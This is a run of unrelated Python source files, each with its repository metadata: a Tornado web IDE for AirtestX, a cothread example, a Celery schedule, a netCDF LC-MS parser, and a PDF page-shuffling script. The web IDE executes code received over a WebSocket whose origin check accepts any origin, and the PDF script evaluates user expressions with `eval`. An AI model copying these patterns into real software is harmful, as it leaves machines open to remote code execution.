self.write_message({'type': 'console', 'output': '# '+time.strftime('%H:%M:%S') + ' start running\n'})
try:
# python code always UTF-8
code = code.encode('utf-8')
# hot patch
code = code.replace('atx.click_image', 'd.click_image')
exec code in {
'highlight_block': self._highlight_block,
'__name__': '__main__',
'__file__': filename}
except RuntimeError as e:
if str(e) != 'stopped':
raise
print 'Program stopped'
except Exception as e:
self.write_message({'type': 'traceback', 'output': traceback.format_exc()})
finally:
self._run = False
self.write_message({'type': 'run', 'status': 'ready'})
sys.stdout = __sysout
@run_on_executor
def background_task(self, code):
self.write_message({'type': 'run', 'status': 'running'})
self.run_blockly(code)
return True
@tornado.gen.coroutine
def on_message(self, message_text):
message = None
try:
message = json.loads(message_text)
except:
print 'Invalid message from browser:', message_text
return
command = message.get('command')
if command == 'refresh':
imgs = base.list_images(path=IMAGE_PATH)
imgs = [dict(
path=name.replace('\\', '/'), name=os.path.basename(name)) for name in imgs]
self.write_message({'type': 'image_list', 'data': list(imgs)})
elif command == 'stop':
self._run = False
            self.write_message({'type': 'run', 'notify': 'Stopping'})
elif command == 'run':
if self._run:
                self.write_message({'type': 'run', 'notify': 'Running'})
return
self._run = True
res = yield self.background_task(message.get('code'))
self.write_message({'type': 'run', 'status': 'ready', 'notify': '运行结束', 'result': res})
else:
self.write_message(u"You said: " + message)
def on_close(self):
log.info("WebSocket closed")
def check_origin(self, origin):
return True
class WorkspaceHandler(tornado.web.RequestHandler):
def get(self):
ret = {}
ret['xml_text'] = read_file('blockly.xml', default='<xml xmlns="http://www.w3.org/1999/xhtml"></xml>')
ret['python_text'] = read_file('blockly.py')
self.write(ret)
def post(self):
log.info("Save workspace")
xml_text = self.get_argument('xml_text')
python_text = self.get_argument('python_text')
write_file('blockly.xml', xml_text)
write_file('blockly.py', python_text)
class ScreenshotHandler(tornado.web.RequestHandler):
def get(self):
d = atx.connect(**atx_settings)
d.screenshot('_screen.png')
self.set_header('Content-Type', 'image/png')
with open('_screen.png', 'rb') as f:
while 1:
data = f.read(16000)
if not data:
break
self.write(data)
self.finish()
def post(self):
raw_image = self.get_argument('raw_image')
filename = self.get_argument('filename')
image = imutils.open(raw_image)
cv2.imwrite(filename, image)
self.write({'status': 'ok'})
class StaticFileHandler(tornado.web.StaticFileHandler):
def get(self, path=None, include_body=True):
path = path.encode(base.SYSTEM_ENCODING) # fix for windows
return super(StaticFileHandler, self).get(path, include_body)
def make_app(settings={}):
static_path = os.getcwd()
application = tornado.web.Application([
(r"/", MainHandler),
(r'/ws', DebugWebSocket), # code debug
(r"/workspace", WorkspaceHandler), # save and write workspace
(r"/images/screenshot", ScreenshotHandler),
(r'/api/images', ImageHandler),
(r'/static_imgs/(.*)', StaticFileHandler, {'path': static_path}),
], **settings)
return application
def main(web_port=None, host=None, port=None, open_browser=True, workdir='.'):
application = make_app({
'static_path': os.path.join(__dir__, 'static'),
'template_path': os.path.join(__dir__, 'static'),
'debug': True,
})
if not web_port:
web_port = get_valid_port()
global device
# global workdir
atx_settings['host'] = host
atx_settings['port'] = port
# device = atx.connect(host=kws.get('host'), port=kws.get('port'))
# TODO
# filename = 'blockly.py'
IMAGE_PATH.append('images/blockly')
if open_browser:
url = 'http://127.0.0.1:{}'.format(web_port)
webbrowser.open(url, new=2) # 2: open new tab if possible
application.listen(web_port)
log.info("Server started.")
log.info("Listening port on 127.0.0.1:{}".format(web_port))
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
Andy-hpliu/AirtestX
|
atx/cmds/webide.py
|
Python
|
apache-2.0
| 7,985 | 0.002385 |
#!/bin/env dls-python2.6
'''Channel Access Example'''
from __future__ import print_function
# load correct version of catools
import require
from cothread.catools import *
print(caget('SR21C-DI-DCCT-01:SIGNAL'))
|
epicsdeb/cothread
|
examples/simple.py
|
Python
|
gpl-2.0
| 216 | 0 |
from . import check_academic_calendar
from celery.schedules import crontab
from backoffice.celery import app as celery_app
celery_app.conf.beat_schedule.update({
'|Education group| Check academic calendar': {
'task': 'education_group.tasks.check_academic_calendar.run',
'schedule': crontab(minute=0, hour=0, day_of_month='*', month_of_year='*', day_of_week=0)
},
})
|
uclouvain/osis
|
education_group/tasks/__init__.py
|
Python
|
agpl-3.0
| 391 | 0.002558 |
"""
" "
" This file is part of the 20n/act project. "
" 20n/act enables DNA prediction for synthetic biology/bioengineering. "
" Copyright (C) 2017 20n Labs, Inc. "
" "
" Please direct all queries to act@20n.com. "
" "
" This program is free software: you can redistribute it and/or modify "
" it under the terms of the GNU General Public License as published by "
" the Free Software Foundation, either version 3 of the License, or "
" (at your option) any later version. "
" "
" This program is distributed in the hope that it will be useful, "
" but WITHOUT ANY WARRANTY; without even the implied warranty of "
" MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the "
" GNU General Public License for more details. "
" "
" You should have received a copy of the GNU General Public License "
" along with this program. If not, see <http://www.gnu.org/licenses/>. "
" "
"""
from __future__ import absolute_import, division, print_function
import netCDF4 as nc4
def load_lcms_trace(filename):
# netCDF4 documentation lives at
# http://unidata.github.io/netcdf4-python/
print("loading %s" % filename)
nc_file = nc4.Dataset(filename, "r", format="NETCDF4")
timepoints = nc_file.variables['scan_acquisition_time']
scan_points_start = nc_file.variables['scan_index']
scan_points_count = nc_file.variables['point_count']
all_mz_values = nc_file.variables['mass_values']
all_intensity_values = nc_file.variables['intensity_values']
results = []
for i in range(timepoints.size):
points_start = scan_points_start[i]
point_count = scan_points_count[i]
points_end = points_start + point_count
mzs = all_mz_values[points_start:points_end]
        assert mzs.size == point_count, "mz count mismatch: %d vs %d" % (point_count, mzs.size)
intensities = all_intensity_values[points_start:points_end]
        assert intensities.size == point_count, "intensity count mismatch: %d vs %d" % (point_count, intensities.size)
spectrum = {
'time': timepoints[i],
'mz': mzs,
'intensity': intensities
}
results.append(spectrum)
return results
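# Illustrative usage of load_lcms_trace (a minimal sketch, not part of the original module;
# "run01.nc" is a placeholder filename):
#   spectra = load_lcms_trace("run01.nc")
#   first = spectra[0]
#   print(first['time'], first['mz'].size, first['intensity'].size)
# Each entry pairs one scan's acquisition time with its m/z and intensity arrays.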
|
20n/act
|
reachables/src/main/python/DeepLearningLcmsPeak/netcdf/netcdf_parser.py
|
Python
|
gpl-3.0
| 2,813 | 0.000711 |
#!/usr/bin/env python3
# encoding: utf-8
'''
Other good PDF utils available on Debian/Ubuntu Linux:
pdfshuffler a gui of PyPDF.
pdfgrep searches pdf files for a regular expression. For example, "pdfgrep -n scare *.pdf" searches for a word among the pdf files under the current directory.
cups-pdf PDF printer for CUPS. It does what SmartPrint does on Windows.
ImageMagick http://www.imagemagick.org/script/index.php. ImageMagick® is a software suite to create, edit, compose, or convert bitmap images.
briss http://sourceforge.net/projects/briss/. This project aims to offer a simple cross-platform application for cropping PDF files. A simple user interface lets you define exactly the crop-region by fitting a rectangle on the visually overlaid pages. Note: Cropping changes page size.
http://ma.juii.net/blog/scale-page-content-of-pdf-files, How to scale the page content of PDF files?
http://stackoverflow.com/questions/6118635/what-is-the-best-pdf-open-source-library-for-java
http://blog.mashape.com/post/66047403916/list-of-50-pdf-generation-manipulation-and
http://www.cyberciti.biz/faq/removing-password-from-pdf-on-linux/, HowTo: Linux Remove a PDF File Password Using Command Line Options
PDF Clown http://www.stefanochizzolini.it/common/contents/projects/clown/samples/PageCoordinatesSample.java, ctm.getScaleX()
iText http://itextpdf.com/product/itext. iText is a Java PDF library that allows you to CREATE, ADAPT, INSPECT and MAINTAIN documents in the Portable Document Format (PDF). It's dual-licensed.
PyPDF2 http://knowah.github.io/PyPDF2/, https://github.com/knowah/PyPDF2. PDF toolkit implemented solely in Python. PyPDF2 does what pdftk does. pdfshuffler is a GUI of PyPDF.
multivalent http://multivalent.sourceforge.net/Tools/index.html. PDF tools written in Java.
[PDFjam Examples]
1. Resize all pages to A5. Note: The scale ratio is derived from the first page. The other pages don't scale correctly if their sizes differ from the first one.
$ pdfjam --paper a5paper --outfile ~/tmp/04.pdf 04.pdf
2. Rotate all pages in counter-clockwise 90 degress.
$ pdfjam --angle 90 --landscape --outfile ~/tmp/04.pdf 04.pdf
3. Remove pages 2-3 and 11-12, and insert a blank page after page 1.
pdfjam --outfile ~/tmp/04.pdf 04.pdf "1,{},4-10,13-"
4. Split a file into three parts.
$ pdfjam --outfile ~/tmp/04_part1.pdf 04.pdf "1-10"
$ pdfjam --outfile ~/tmp/04_part2.pdf 04.pdf "11-30"
$ pdfjam --outfile ~/tmp/04_part3.pdf 04.pdf "31-"
5. Merge multiple files into one.
$ pdfjam --outfile ~/tmp/04.pdf ~/tmp/04_part1.pdf ~/tmp/04_part2.pdf ~/tmp/04_part3.pdf
6. Combine multiple pages onto each sheet.
$ pdfjam --nup 2x1 --landscape --outfile ~/tmp/04.pdf 04.pdf
7. Clip a page into two pages.
Assume 01exp.pdf contains only one physical page, which consists of two logical pages, and "Paper Size: A4, Landscape (11.69 x 8.27 inch)". (01exp.pdf can be generated from "pdfjam --landscape --outfile 01exp.pdf 01a4-book.pdf 1")
Need to clip it into two pages, each "Paper Size: A4, Portrait (8.27 x 11.69 inch)". A DIN A4 page (width×height) = 210x297 mm = 595×842 pps = 8.27x11.69 inch. 1 inch = 72 pps = 25.4 millimeter.
Get the left logical page:
$ pdfjam --trim "0 0 148.5mm 0" --outfile 01expL.pdf 01exp.pdf
Get the right logical page:
$ pdfjam --trim "148.5mm 0 0 0" --outfile 01expR.pdf 01exp.pdf
8. Scale the page content of PDF files while keeping the physical page size the same. (http://www2.warwick.ac.uk/fac/sci/statistics/staff/academic-research/firth/software/pdfjam/, http://ma.juii.net/blog/scale-page-content-of-pdf-files)
Scale at center and move the given offset relative to the left-bottom.
$ pdfjam --scale 1.06 --offset '2cm 2cm' --outfile tmp2/A1_06.pdf tmp2/A.pdf
9. Arrange pages into a booklet. Note: pass the total page number, rounded up to a multiple of 4, to "--signature".
$ pdfbook --short-edge --signature 56 04.pdf
10.
$ pdfjam --landscape --offset "6mm 0" --outfile 1final.pdf ~/tmp/1nup.pdf (move content 6mm right-forward)
[Advanced PDFjam Examples]
1. Make an A5 booklet for "Disney's World Of English book 01.pdf".
This file contains 57 pages. The last page is meaningless and I decide not to print it. The first page is much larger than the others, so it's necessary to resize them separately.
1.1 Rename to a shorter name.
$ cp Disney\'s\ World\ Of\ English\ book\ 01.pdf 01.pdf
1.2 Resize the first page.
$ pdfjam --paper a4paper --outfile 01p1.pdf 01.pdf 1
1.3 Resize the other pages except 57.
$ pdfjam --paper a4paper --outfile 01p2.pdf 01.pdf 2-56
1.4 Merge all pages.
$ pdfjam --outfile 01a4.pdf 01p1.pdf 01p2.pdf
1.5 Make a booklet.
$ pdfbook --short-edge --signature 56 01a4.pdf
If left blank of each logical page is desired, use following command:
$ pdfbook --short-edge --signature 56 --delta "2cm 0" 01a4.pdf
The final output is 01a4-book.pdf. Each logical page size is A5. Print it double-side, then bind pages at the middle.
2. Print "truck town" twoside, each side contains 4 A6 pages.
truck.pdf contains 420 pages. There are 35 booklets, each containing 12 pages. There are 4 meaningless pages in each booklet: pages 2, 3, 11 and 12. So there are 8*35 pages to print. If they are printed 4 pages per A4 sheet, two-sided, only 35 A4 sheets are required.
2.1 Delete pages 2, 3, 11 and 12 in each booklet. The result pdf contains 280 pages.
$ pdf_shuffer.py -d 12*n+2,12*n+3,12*n+11,12*n+12 truck.pdf tmp
2.2 Combine 4 pages. The result pdf contains 70 physical pages. Paper size is scaled to A4 automatically.
$ pdfjam --nup 2x2 --delta "2mm 2mm" --frame true --outfile truck22.pdf tmp/truck.pdf
2.3 There's no space reserved for binding on each page of the result pdf of the above step. The following command reserves 10 mm at each paper's left side. The scale ratio is: 1 - offset * 2 / 210 = 0.95238.
$ pdfjam --scale 0.95238 --offset "5mm 0" --twoside --outfile truck22o.pdf truck22.pdf
The final output is truck22o.pdf. Each logical page size is A6. Print it double-side, then bind pages at the left.
3. Make an A6 booklet for "truck town".
3.1 Resize all pages to A4.
$ pdfjam --paper a4paper --outfile trucka4.pdf truck.pdf
3.2 Make an A5 booklet.
$ pdfbook --short-edge --signature 12 trucka4.pdf
3.3 The total page number 210 (must be even) of trucka4.pdf is not a multiple of 4. To fix that, append two blank pages at the end.
$ pdfjam --landscape --outfile trucka4-book2.pdf trucka4-book.pdf "1-,{},{}"
3.4 Swap 4n+2 and 4n+3.
$ pdf_shuffer.py -m 4*n+3:4*n+2 trucka4-book2.pdf tmp
3.5 Combine every 2 pages into one.
$ pdfjam --nup 1x2 --frame true --outfile trucka4-book3.pdf tmp/trucka4-book2.pdf
The final output is trucka4-book3.pdf. Each logical page size is A6. Print it double-side, cut each A4 paper into two A5, bind every 6 A5 papers into an A6 booklet.
[TODO]
1. How to scale two dimensions separately? gs sometimes works, sometimes breaks.
$ pdfjam --no-tidy --scale "1 1.2" trucka4.pdf
$ pdfjam --trim "0 30.375 0 30.375" --clip true --frame true trucka4.pdf
2. pdfjam cannot query the number of pages. pdfinfo can do that. Maybe it's better to replace pdftk with pdfjam & pdfinfo in this script?
'''
import subprocess
import tempfile
import os.path
import argparse
import re
import shutil
import locale
import logging
import sys
import readline
import traceback
tmpd_ = tempfile.TemporaryDirectory()
#tmpd = tmpd_.name
tmpd = '/tmp' # Keep the temporary directory when debugging
patt_add_exp = r'^[\dn+\-*/]+:[\dn+\-*/]+(,[\dn+\-*/]+:[\dn+\-*/]+)*(@\d+(-\d+)?(,\d+(-\d+)?)*)?$'
patt_del_exp = r'^[\dn+\-*/]+(,[\dn+\-*/]+)*(@\d+(-\d+)?(,\d+(-\d+)?)*)?$'
patt_mov_exp = patt_add_exp
patt_rotate_exp = patt_del_exp
patt_join_exp = patt_del_exp
patt_split_exp = patt_del_exp
patt_pg_size = r'Page\s+(?P<pn>\d+)\s+size:\s+(?P<width>[\d\.]+)\s+x\s+(?P<height>[\d\.]+)\s+.*'
patt_paper = '^a[1-6]paper$'
encoding = locale.getdefaultlocale()[1]
if(not encoding):
# None means the portable 'C' locale. However str.decode(encoding) doesn't accept None.
encoding = 'ASCII'
def getstatusoutput(cmdline, keepStdErr=True, raiseException=True):
logging.info(str(cmdline))
if(keepStdErr):
err = subprocess.STDOUT
else:
err = None
stdout = subprocess.PIPE
proc = subprocess.Popen(cmdline, stdout=stdout, stderr=err, shell=isinstance(cmdline, str))
out, _ = proc.communicate()
if(out):
out2 = out.decode(encoding, 'ignore')
else:
out2 = ''
logging.info(out2)
# A None value indicates that the process hasn't terminated yet.
assert(proc.returncode!=None)
if(proc.returncode!=0 and raiseException):
raise Exception('command failure: ' + str(cmdline))
return(proc.returncode, out2)
def reglob(path, exp, invert=False):
"""glob.glob() style searching which uses regex
:param exp: Regex expression for filename
:param invert: Invert match to non matching files
"""
m = re.compile(exp)
if invert is False:
res = [f for f in os.listdir(path) if m.match(f)]
else:
res = [f for f in os.listdir(path) if not m.match(f)]
res = list(map(lambda x: os.path.join(path, x), res))
return res
class RangeList(object):
def __init__(self, spec):
'''1,3-5,6'''
self.rl = list()
for subspec in spec.split(','):
tokens = subspec.split('-')
begin = int(tokens[0])
if(len(tokens)>=2):
end = int(tokens[1])
else:
end = begin
self.rl.append(range(begin, end+1))
def __iter__(self):
for r in self.rl:
for i in r:
yield i
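# Illustrative usage of RangeList (a minimal sketch, not part of the original script):
#   list(RangeList('1,3-5,6'))  ->  [1, 3, 4, 5, 6]
# Each comma-separated item is either a single page number or an inclusive "begin-end" range.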
def eval_del_exp(max_pn, del_exp):
if(re.match(patt_del_exp, del_exp) == None):
raise Exception('invalid del_exp: ' + del_exp)
ops = list()
tokens = del_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
del_exp = tokens[0]
exps = del_exp.split(',')
for exp_pn in exps:
if(exp_pn.find('n') == -1):
# constant page no
pn = int(exp_pn)
if((pn > 0) and (pn <= max_pn)):
ops.append(pn)
continue
for n in n_range:
try:
pn = int(eval(exp_pn))
except (NameError, SyntaxError):
print('invalid del_exp: '+ del_exp)
raise
if((pn >= 1) and (pn <= max_pn)):
ops.append(pn)
ops = sorted(set(ops))
return ops
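# Worked example for eval_del_exp (illustrative, assuming a 24-page document):
#   eval_del_exp(24, '1,12*n+11,12*n+12')  ->  [1, 11, 12, 23, 24]
# i.e. the constant page 1 plus the pages 12n+11 and 12n+12 that fall within 1..24.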
def eval_add_exp(max_pn, add_exp):
if(re.match(patt_add_exp, add_exp) == None):
raise Exception('invalid add_exp: ' + add_exp)
ops = dict()
tokens = add_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
add_exp = tokens[0]
exps = add_exp.split(',')
for exp in exps:
add_spec = exp.split(':')
exp_pn = add_spec[0]
exp_blanks = add_spec[1]
if(exp.find('n') == -1):
# constant page no
pn = int(exp_pn)
blanks = int(exp_blanks)
if((pn >= 1) and (pn <= max_pn + 1) and (blanks >= 1) and (pn not in ops)):
ops[pn] = blanks
continue
for n in n_range:
try:
pn = int(eval(exp_pn))
blanks = int(eval(exp_blanks))
except (NameError, SyntaxError):
print('invalid add_exp: '+ add_exp)
raise
if((pn >= 1) and (pn <= max_pn + 1) and (blanks >= 1) and (pn not in ops)):
ops[pn] = blanks
return sorted(ops.items())
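# Worked example for eval_add_exp (illustrative, assuming a 10-page document):
#   eval_add_exp(10, '5:1')      ->  [(5, 1)]                    # one blank page before page 5
#   eval_add_exp(10, '5*n+1:2')  ->  [(1, 2), (6, 2), (11, 2)]   # two blanks before pages 1, 6 and 11 (the end)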
def eval_mov_exp(max_pn, mov_exp):
assert(mov_exp!=None)
if(re.match(patt_mov_exp, mov_exp) == None):
raise Exception('invalid mov_exp: ' + mov_exp)
ops = list()
tokens = mov_exp.split('@')
if(len(tokens)>=2):
n_range = RangeList(tokens[1])
else:
n_range = range(0, max_pn+1)
mov_exp = tokens[0]
exps = mov_exp.split(',')
for exp in exps:
mov_spec = exp.split(':')
exp_pn1 = mov_spec[0]
exp_pn2 = mov_spec[1]
if(exp.find('n') == -1):
# constant page no
pn1 = int(exp_pn1)
pn2 = int(exp_pn2)
if((pn1 >= 1) and (pn1 <= max_pn) and (pn2 >= 1) and (pn2 <= max_pn + 1)):
ops.append((pn1, pn2))
continue
for n in n_range:
try:
pn1 = int(eval(exp_pn1))
pn2 = int(eval(exp_pn2))
except (NameError, SyntaxError):
print('invalid mov_exp: '+ mov_exp)
raise
if((pn1 >= 1) and (pn1 <= max_pn) and (pn2 >= 1) and (pn2 <= max_pn + 1)):
ops.append((pn1, pn2))
return ops
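# Worked example for eval_mov_exp (illustrative, assuming a 10-page document):
#   eval_mov_exp(10, '5:1')  ->  [(5, 1)]
# meaning: move page 5 to just before page 1 (the actual shuffling is done in op_move).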
'''ints is a list or a set of integers.'''
def ints2str(ints):
ints = list(ints)
ints.sort()
l = (str(item) for item in ints)
res = ' '.join(l)
return res
def pg_path_patt():
return os.path.join(tmpd, 'pg_%d.pdf')
def pg_paths():
    return reglob(tmpd, r'^pg_\d+.pdf$')
def pg_path(pg_no):
return os.path.join(tmpd, 'pg_%d.pdf'%pg_no)
def pg_num(pg_fp):
return int(os.path.splitext(os.path.basename(pg_fp))[0][3:])
def blank_fp(prototype_fp):
fp = os.path.join(tmpd, 'blank1.pdf')
if(os.path.isfile(fp)):
return fp
assert(os.path.isfile(prototype_fp))
getstatusoutput(['pdfjam', '--outfile', fp, prototype_fp, '{},1'])
getstatusoutput(['pdfjam', '--outfile', fp, fp, '1'])
assert(os.path.isfile(fp))
return fp
def pglist2str(pglist):
l = (os.path.basename(item) for item in pglist)
return ' '.join(l)
'''
There are several ways to get number of pages:
zhichyu@jupiter:~$ pdftk 01.pdf dump_data
InfoKey: Creator
InfoValue: ACDSee
InfoKey: Title
InfoValue: ACDSee PDF Image.
InfoKey: CreationDate
InfoValue: D:20070303102909
NumberOfPages: 57
zhichyu@jupiter:~$ pdftk 01.pdf burst
zhichyu@jupiter:~$ cat doc_data.txt
InfoKey: Creator
InfoValue: ACDSee
InfoKey: Title
InfoValue: ACDSee PDF Image.
InfoKey: CreationDate
InfoValue: D:20070303102909
NumberOfPages: 57
zhichyu@jupiter:~/tmp$ pdfinfo -f 1 -l 100000 /home/zhichyu/tmp/1.pdf
Creator: TeX
Producer: iText® 5.2.0 ©2000-2012 1T3XT BVBA
CreationDate: Mon Jan 20 16:17:38 2014
ModDate: Mon Jan 20 16:22:03 2014
Tagged: no
Form: none
Pages: 34
Encrypted: no
Page 1 size: 522.24 x 773.81 pts
Page 1 rot: 0
Page 2 size: 520.24 x 769.81 pts
Page 2 rot: 0
Page 3 size: 522.24 x 773.81 pts
Page 3 rot: 0
Page 4 size: 520.24 x 769.81 pts
Page 4 rot: 0
Page 5 size: 522.24 x 773.81 pts
Page 5 rot: 0
Page 6 size: 520.24 x 769.81 pts
Page 6 rot: 0
Page 7 size: 522.24 x 773.81 pts
Page 7 rot: 0
Page 8 size: 520.24 x 769.81 pts
Page 8 rot: 0
Page 9 size: 522.24 x 773.81 pts
Page 9 rot: 0
Page 10 size: 520.24 x 769.81 pts
Page 10 rot: 0
Page 11 size: 522.24 x 773.81 pts
Page 11 rot: 0
Page 12 size: 520.24 x 769.81 pts
Page 12 rot: 0
Page 13 size: 522.24 x 773.81 pts
Page 13 rot: 0
Page 14 size: 520.24 x 769.81 pts
Page 14 rot: 0
Page 15 size: 522.24 x 773.81 pts
Page 15 rot: 0
Page 16 size: 520.24 x 769.81 pts
Page 16 rot: 0
Page 17 size: 522.24 x 773.81 pts
Page 17 rot: 0
Page 18 size: 520.24 x 769.81 pts
Page 18 rot: 0
Page 19 size: 522.24 x 773.81 pts
Page 19 rot: 0
Page 20 size: 520.24 x 769.81 pts
Page 20 rot: 0
Page 21 size: 522.24 x 773.81 pts
Page 21 rot: 0
Page 22 size: 520.24 x 769.81 pts
Page 22 rot: 0
Page 23 size: 522.24 x 773.81 pts
Page 23 rot: 0
Page 24 size: 520.24 x 769.81 pts
Page 24 rot: 0
Page 25 size: 522.24 x 773.81 pts
Page 25 rot: 0
Page 26 size: 520.24 x 769.81 pts
Page 26 rot: 0
Page 27 size: 522.24 x 773.81 pts
Page 27 rot: 0
Page 28 size: 520.24 x 769.81 pts
Page 28 rot: 0
Page 29 size: 522.24 x 773.81 pts
Page 29 rot: 0
Page 30 size: 520.24 x 769.81 pts
Page 30 rot: 0
Page 31 size: 522.24 x 773.81 pts
Page 31 rot: 0
Page 32 size: 520.24 x 769.81 pts
Page 32 rot: 0
Page 33 size: 522.24 x 773.81 pts
Page 33 rot: 0
Page 34 size: 520.24 x 769.81 pts
Page 34 rot: 0
File size: 3808037 bytes
Optimized: no
PDF version: 1.4
'''
def get_num_pages(fp):
rc, output = getstatusoutput(['pdftk', fp, 'dump_data'])
name = 'NumberOfPages:'
val = 0
for line in output.splitlines():
if(line.startswith(name)):
val = line[len(name):].strip()
val = int(val)
break
return val
def get_pages_size(fp):
rc, output = getstatusoutput(['pdfinfo', '-f', '1', '-l', '100000', fp])
i = 0
sizes = list()
patt = re.compile(patt_pg_size)
for line in output.splitlines():
m = patt.match(line)
if(m==None):
continue
pn = int(m.group('pn'))
width = float(m.group('width'))
height = float(m.group('height'))
assert(pn == i+1)
sizes.append((width, height))
i += 1
return sizes
def is_same_size(pg_sizes):
assert(len(pg_sizes)>=1)
same_size = True
for i in range(1, len(pg_sizes)):
(width1, height1) = pg_sizes[i-1]
(width2, height2) = pg_sizes[i]
if(width1!=width2 or height1!=height2):
same_size = False
return same_size
def get_pages_orientation(pg_sizes):
# All pages could be in the different orientation.
orientation = list()
assert(len(pg_sizes)>=1)
num_portrait = 0
num_landscape = 0
for i in range(0, len(pg_sizes)):
(width, height) = pg_sizes[i]
if(width >= height):
num_landscape += 1
else:
num_portrait += 1
if(num_portrait >= num_landscape):
return True
else:
return False
def rotate_inplace(fp):
#pdfjam --angle 90 --landscape --outfile ~/tmp/04.pdf 04.pdf
sizes = get_pages_size(fp)
is_portrait = get_pages_orientation(sizes)
tmp_fp = os.path.join(tmpd, os.path.basename(fp)+'.rotated')
if(is_portrait):
getstatusoutput(['pdfjam', '--landscape', '--angle', '90', '--outfile', tmp_fp, fp])
else:
getstatusoutput(['pdfjam', '--angle', '90', '--outfile', tmp_fp, fp])
shutil.copyfile(tmp_fp, fp)
def split(fp):
getstatusoutput(['pdftk', fp, 'burst', 'output', pg_path_patt()])
pages = sorted(pg_paths(), key=pg_num)
return pages
def merge(pages, dst_fp):
getstatusoutput(['pdftk'] + pages + ['cat', 'output', dst_fp])
def erase_pg(pglist2, new_pn):
assert(new_pn<=len(pglist2))
del pglist2[new_pn - 1]
for i in range(new_pn-1, len(pglist2)):
pg = pglist2[i]
pg[1] -= 1
def insert_pg(pglist2, new_pn, pg):
pg[1] = new_pn
pglist2.insert(new_pn-1, pg)
for i in range(new_pn, len(pglist2)):
pg = pglist2[i]
pg[1] += 1
'''Add blank pages per an expression.'''
def op_add(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
add_spec = eval_add_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + str(add_spec))
if(len(add_spec) == 0):
shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
pglist = list() # pglist1 item structure: pg_path
for i in range(0, max_pn):
pglist.append(pg_path(i+1))
blank1 = blank_fp(pages[0])
for item in reversed(add_spec):
orig_pn = item[0]
blank_pg_num = item[1]
if(orig_pn > max_pn):
for i in range(0, blank_pg_num):
pglist.append(blank1)
else:
for i in range(0, blank_pg_num):
pglist.insert(orig_pn-1, blank1)
merge(pglist, outfile)
'''Delete pages whose numbers match an expression.'''
def op_delete(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
del_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(del_spec))
if(len(del_spec) == 0):
shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
pglist = list() # pglist item structure: [remained, pg_path]
for i in range(0, max_pn):
pglist.append([True, pg_path(i+1)])
for i in del_spec:
pglist[i-1][0] = False
# generator expression is more powerful than built-in filter().
pglist = list(item[1] for item in pglist if item[0]==True)
merge(pglist, outfile)
'''Move pages per an expression.'''
def op_move(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
mov_spec = eval_mov_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + str(mov_spec))
if(len(mov_spec) == 0):
shutil.copyfile(infile, outfile)
else:
getstatusoutput(['pdftk', infile, 'burst', 'output', pg_path_patt()])
pages = sorted(pg_paths(), key=pg_num)
assert(max_pn == len(pages))
pglist1 = list() # pglist1 item structure: [orig_pn, new_pn, pg_path]. pglist1 is indexed by orig_pn-1.
pglist2 = list() # pglist2 is a shallow copy of pglist1, and is indexed by new_pn-1.
for i in range(0, max_pn):
item = [i+1, i+1, pg_path(i+1)]
pglist1.append(item)
pglist2 = pglist1.copy()
for (orig_pn1, orig_pn2) in mov_spec:
pg1 = pglist1[orig_pn1 - 1]
new_pn1 = pg1[1]
erase_pg(pglist2, new_pn1)
if(orig_pn2 > max_pn):
# move pages to the end
assert(orig_pn2 == max_pn + 1)
insert_pg(pglist2, max_pn+1, pg1)
else:
# normal movement
pg2 = pglist1[orig_pn2 - 1]
new_pn2 = pg2[1]
insert_pg(pglist2, new_pn2, pg1)
# generator expression is more powerful than built-in filter().
pglist = list(item[2] for item in pglist2)
merge(pglist, outfile)
'''Rotate pages whose numbers match an expression.'''
def op_rotate(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
rotate_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(rotate_spec))
    if(len(rotate_spec) == 0):
        if(outfile != infile):
            shutil.copyfile(infile, outfile)
else:
pages = split(infile)
assert(max_pn == len(pages))
for i in range(0, max_pn):
if i+1 in rotate_spec:
rotate_inplace(pages[i])
merge(pages, outfile)
def op_join(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
join_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(join_spec))
if(len(join_spec) == 0):
if(outfile != infile):
shutil.copyfile(infile, outfile)
else:
sizes = get_pages_size(infile)
pages = split(infile)
assert(max_pn == len(pages))
pglist = list()
i = 0
while(i < max_pn):
if(i+1 in join_spec and i+1 < max_pn):
                # FIXME: pdfjam requires all PDF file names to use the '.pdf' suffix.
tmp_page1 = pages[i] + '.tmp1.pdf'
tmp_page2 = pages[i] + '.tmp2.pdf'
merge([pages[i], pages[i+1]], tmp_page1)
is_portrait = get_pages_orientation(sizes[i:i+2])
if(is_portrait):
cmd = ['pdfjam', '--landscape', '--nup', '2x1', '--outfile', tmp_page2, tmp_page1]
else:
cmd = ['pdfjam', '--nup', '1x2', '--outfile', tmp_page2, tmp_page1]
getstatusoutput(cmd)
pglist.append(tmp_page2)
i += 2
else:
pglist.append(pages[i])
i += 1
merge(pglist, outfile)
def op_split(infile, outfile, expression):
max_pn = get_num_pages(infile)
logging.info('max_pn: ' + str(max_pn))
split_spec = eval_del_exp(max_pn, expression)
logging.info('expression is evaluated to: ' + ints2str(split_spec))
if(len(split_spec) == 0):
if(outfile != infile):
shutil.copyfile(infile, outfile)
else:
sizes = get_pages_size(infile)
pages = split(infile)
assert(max_pn == len(pages))
pglist = list()
i = 0
while(i < max_pn):
if(i+1 in split_spec):
width, height = sizes[i]
if(width>=height):
is_portrait = False
size1 = '0 0 %fpts 0' % (width/2) # left, top, right, bottom
size2 = '%fpts 0 0 0' % (width/2)
else:
is_portrait = True
